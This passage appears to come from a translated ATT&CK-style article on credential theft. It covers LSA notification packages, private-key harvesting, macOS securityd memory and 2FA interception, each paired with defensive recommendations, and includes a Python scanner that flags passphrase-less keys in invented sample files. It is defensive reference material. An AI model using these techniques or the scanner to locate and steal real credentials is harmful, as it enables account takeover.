HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\[Notification Packages]
Monitor this value for changes and watch for new DLLs loaded into lsass.exe that do not correspond to known software.

Private Keys


System: Windows, Linux, macOS
Rights: User
Description: Private keys and certificates are used for authentication, encryption/decryption and digital signatures.
Attackers collect private keys from compromised systems, such as SSH keys, to authenticate to remote services or to decrypt other collected data.

Common key file extensions are .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b and .asc. Typical locations are ~/.ssh on *nix systems and C:\Users\(username)\.ssh\ on Windows.

Keys may be protected by a passphrase, which the attacker can try to brute-force offline or capture with a keylogger.

Security recommendations: Use strong passphrases on private keys. Where possible, store keys on dedicated cryptographic hardware rather than on the local system.

Ensure that only authorised keys are allowed access to critical resources and audit the authorised-key lists regularly. Set permissions on directories holding private keys so that only their owner can read them.

Monitor access to files and directories holding keys and certificates, and review authentication logs for unusual use of keys for remote logon.
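The triage a defender (or an attacker) performs on the key files found at the locations above is shown here as an added example, not code from the original article: it classifies each file by format and reports which private keys are stored without a passphrase. The file contents are constructed stubs carrying only realistic headers and, for the OpenSSH format, only the container's cipher field; they are not real keys.

```python
# Added example: find private keys that are stored without a passphrase.
import base64
import re
import struct

PEM_BEGIN = re.compile(r"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----")
PEM_END = re.compile(r"-----END [A-Z0-9 ]*PRIVATE KEY-----")


def _pem_body(text: str) -> str:
    """Base64 body between the BEGIN and END lines; traditional PEM puts
    'Header: value' lines and a blank line first, which are skipped."""
    start = PEM_BEGIN.search(text).end()
    end = PEM_END.search(text)
    body = text[start:end.start() if end else len(text)]
    lines = [ln.strip() for ln in body.splitlines()]
    if "" in lines:
        lines = lines[lines.index("") + 1:]
    return "".join(ln for ln in lines if ln and ":" not in ln)


def _openssh_cipher(body_b64: str) -> str:
    """The openssh-key-v1 container starts with a magic string followed by the
    length-prefixed cipher name; 'none' means the key material is unencrypted."""
    blob = base64.b64decode(body_b64)
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        return "unknown"
    pos = len(magic)
    (n,) = struct.unpack(">I", blob[pos:pos + 4])
    return blob[pos + 4:pos + 4 + n].decode("ascii", "replace")


def classify_key(text: str):
    """Return (format, passphrase_protected) for a private-key file, or None if it is not one."""
    m = PEM_BEGIN.search(text)
    if m:
        kind = m.group(1)
        if kind == "ENCRYPTED PRIVATE KEY":          # PKCS#8, always encrypted
            return ("pkcs8", True)
        if kind == "OPENSSH PRIVATE KEY":
            return ("openssh", _openssh_cipher(_pem_body(text)) != "none")
        # Traditional PEM (RSA/EC/DSA) or unencrypted PKCS#8: encrypted only with Proc-Type
        return ("pem", "Proc-Type: 4,ENCRYPTED" in text)
    if text.startswith("PuTTY-User-Key-File-"):
        enc = re.search(r"^Encryption:\s*(\S+)", text, re.MULTILINE)
        return ("ppk", bool(enc) and enc.group(1) != "none")
    return None


def find_unprotected_keys(files):
    """files: {path: contents}. Sorted paths of private keys stored without a passphrase."""
    hits = []
    for path, text in files.items():
        info = classify_key(text)
        if info is not None and not info[1]:
            hits.append(path)
    return sorted(hits)


def _fake_openssh_key(cipher: str) -> str:
    """Constructed stub: only the container header with the cipher name, no key material."""
    blob = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher.encode()
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample files (paths and contents invented for the demo).
SAMPLE_FILES = {
    "/home/alice/.ssh/id_rsa": _fake_openssh_key("none"),
    "/home/alice/.ssh/id_ed25519": _fake_openssh_key("aes256-ctr"),
    "C:/Users/bob/.ssh/legacy.pem": (
        "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
        "DEK-Info: AES-128-CBC,0A1B2C3D0A1B2C3D0A1B2C3D0A1B2C3D\n\nQUJDRA==\n"
        "-----END RSA PRIVATE KEY-----\n"),
    "C:/Users/bob/deploy.key": "-----BEGIN RSA PRIVATE KEY-----\nQUJDRA==\n-----END RSA PRIVATE KEY-----\n",
    "C:/Users/bob/putty.ppk": "PuTTY-User-Key-File-2: ssh-rsa\nEncryption: none\nComment: bob\n",
    "/etc/hostname": "web01\n",
}

if __name__ == "__main__":
    for path in find_unprotected_keys(SAMPLE_FILES):
        print("no passphrase:", path)
```

Pair the scan with the file-permission check from the recommendations: an unencrypted key that is world-readable, or that sits on a share, is the case worth fixing first.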

Securityd Memory (OS X)


System: macOS
Rights: root
Description: In OS X before El Capitan, a user with root access can read the plaintext keychain passwords of logged-in users, because Apple's keychain implementation caches these credentials so that users are not repeatedly prompted for passwords.

Apple's securityd utility takes the user's logon password, encrypts it with PBKDF2 and keeps the resulting master key in memory. Apple also uses a set of keys and algorithms to encrypt the user's password, but once the master key is found, the attacker only needs to iterate over the remaining values to unlock the final password. If the keychain is unlocked, an attacker with root can scan the memory of the securityd process, find the master key and decrypt the keychain.

With root access and an unlocked keychain, the attacker recovers everything stored in it: Wi-Fi passwords, website and application passwords, secure notes, certificates and so on.

Two-Factor Authentication Interception


System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Two-factor or multifactor authentication is recommended and provides stronger protection than a username and password alone, but organisations should be aware of techniques that intercept or bypass it. Attackers may target the second factor itself, such as a smart card or one-time code, to gain access to systems, services and network resources.

If a smart card is used for two-factor authentication (2FA), a keylogger is needed to capture the smart card PIN during normal use. With the card inserted and the PIN known, the attacker can connect to a network resource through the infected system, proxying the authentication through the inserted hardware token.

Attackers can also target hardware token generators such as RSA SecurID. By obtaining the token's seed and the code-generation algorithm, the attacker can produce valid one-time codes.

Other 2FA mechanisms are also vulnerable: one-time codes are commonly sent out of band (by email, SMS and so on), and if the device or service is not secured they can be intercepted.

Security recommendations: Remove smart cards when they are not in use. Protect the devices and services that send and receive out-of-band codes. Identify and block potentially malicious software that could be used to intercept 2FA.

Source: https://habr.com/ru/post/433566/

